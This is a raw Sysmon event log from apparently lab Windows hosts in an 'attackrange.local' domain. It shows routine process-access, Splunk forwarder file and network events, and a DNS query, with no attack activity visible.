19:17:45.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094972Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.759{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90BE45253E779218D9939EC8814CAE19,SHA256=C7DCEDB113883E0C42FE8BC0A6C56021D3A06C7C7BFBE093E0D2FF56F9CE2DDA,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:46.186{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605998Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:46.185{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29870E08A3CAEF5486CAC61A0460B85E,SHA256=02DB3BDF8AB1BF485B126BAE9FD031C6271C68BEFF20027A7F8FB0D4271BB84Dfalsefalse - insufficient disk space 354300x80000000000000001094971Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.724{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1139-false10.0.1.12-8000- 10341000x80000000000000001094970Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094969Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094968Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.127{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B232C9763B194CE8FC657A00FBA5DA41,SHA256=6F46152AEEA24B15142357E558106C0ADA5BA98CDD78453B88ADBC4E205E7134,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094967Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.126{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=944E80624A16CF2F545DC909D33E85C3,SHA256=05775D01DD39E75611D7D075C4A31BD8DE950979DF2D09CFBBD2A9F7DA357FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094976Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.772{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0193B520781AAB79B89A81471CABA44,SHA256=234AC1672336FCDFB45412A0A5665B1628371F9173F833CDE718CE2BCA9F40B5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606001Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.340{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606000Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.340{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F749520F298F212D5B2BBCECE2D7B8E,SHA256=A06E48C1756B3798517A11029454069196630E5761262CA566C5608658F56EF0falsefalse - insufficient disk space 23542300x80000000000000001094975Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.619{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B232C9763B194CE8FC657A00FBA5DA41,SHA256=6F46152AEEA24B15142357E558106C0ADA5BA98CDD78453B88ADBC4E205E7134,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094974Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094973Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:47.481{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094980Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.796{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ECCF6D691EE2521EC92DF05FB7B7616,SHA256=15B1EA5E5EFB2EEDC880BE6FC054B3D3C4F0B73A821F523AF96224085167CE50,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606003Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:48.527{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606002Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:48.527{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3CF5597451E2066154D9DB3C5AE5FC,SHA256=9BD8CFE6FF3D4D2257EDFD25A6E95521726FA659052E2D068BDD09DBB577DC88falsefalse - insufficient disk space 354300x80000000000000001094979Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.213{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local49491- 10341000x80000000000000001094978Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094977Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:48.482{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094984Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.807{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7606B740E24225CD35005BB1402DBBD,SHA256=2DEA2B938D2D47E35EDF250A90E5ED176AF8CE5EDBC1BAA2D617138ABD107057,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606010Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.530{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606009Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.530{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9919C74B33841483AC2AF4EA993A178,SHA256=C2B47C5852411A6E007F7013055E0D5CF8E184B726A6A2AE3D14D28F7A4E5EE9falsefalse - insufficient disk space 10341000x80000000000000001094983Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094982Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.483{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094981Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:49.153{761B69BB-818C-607D-1100-00000000BA01}92NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2BA81CA017AE669CD6F0D7294AA588FD,SHA256=086079BC24F0502CBB4885420380A07BC8AADB86EA1AA85E8B8A6D48D0F79F8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606008Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:47.692{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49723-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606007Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606006Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04A571D93215048A0C0817A02C760FC5,SHA256=49F3FA4BCABB170092CE7B8F8DA4641FA1293A0D44A0531748D74E417490FA7Dfalsefalse - insufficient disk space 11241100x80000000000000001606005Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606004Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:49.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86FC26166BC5467851CF946B767AC1D6,SHA256=F4CFAFF7EB271CE1CE37D678C5D9D245AE91F7DD2E92C11EA9B8831DDC1F5DDEfalsefalse - insufficient disk space 23542300x80000000000000001094987Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:50.824{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A4BA661342360F4A3CF1FEF18CF535,SHA256=084D60C79D836A4D4056144FDE327CEFEAE5ABD625EE06273F5B45308A52BB01,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606012Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:50.532{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606011Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:50.532{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1819F3C4A03FEA463389A781D6CEAEFD,SHA256=2DC0DCA046CC5B02EE632D7B032B05EC0E851B941637A0A8C97EBDFD9B36955Dfalsefalse - insufficient disk space 10341000x80000000000000001094986Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:50.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094985Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:50.484{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606014Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:51.535{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606013Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:51.535{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E078A6FF38C5568CEB1B5D8CC049E560,SHA256=80C0F433FACEE22295FFE7A3AF646AF58650E1151B990A156BF7ACF226B52ECBfalsefalse - insufficient disk space 23542300x80000000000000001094992Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.838{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA1DC844458F287930E100BBCBA5E22,SHA256=A1C7008F78BC6FA999E767D043CE912B5B96EB2F267D9BF6EA3109D48619D6B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001094991Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.851{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1140-false10.0.1.12-8000- 10341000x80000000000000001094990Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094989Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.485{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094988Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:51.269{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74E7B03FB18BCEA155C15674E792CAE0,SHA256=2C7ECA81AED04A8E02654E415B1FD4B8EB77126DE54BC6E02701391BA7369D0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001094995Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.849{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A79CBD0CEFECEA33E654A5A0637D4D21,SHA256=86BA837FE77670EB0F24B674B97E0EE40DD64465BF4C41B449C399A78A050A17,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606016Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.537{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606015Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.537{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF4C262A17767781BC99C475315A3D97,SHA256=A76A0D8DF30B34293F79ECE0B03CAB59DF4C6C2047329EAEF26FFD5C0BEDF66Ffalsefalse - insufficient disk space 10341000x80000000000000001094994Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094993Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 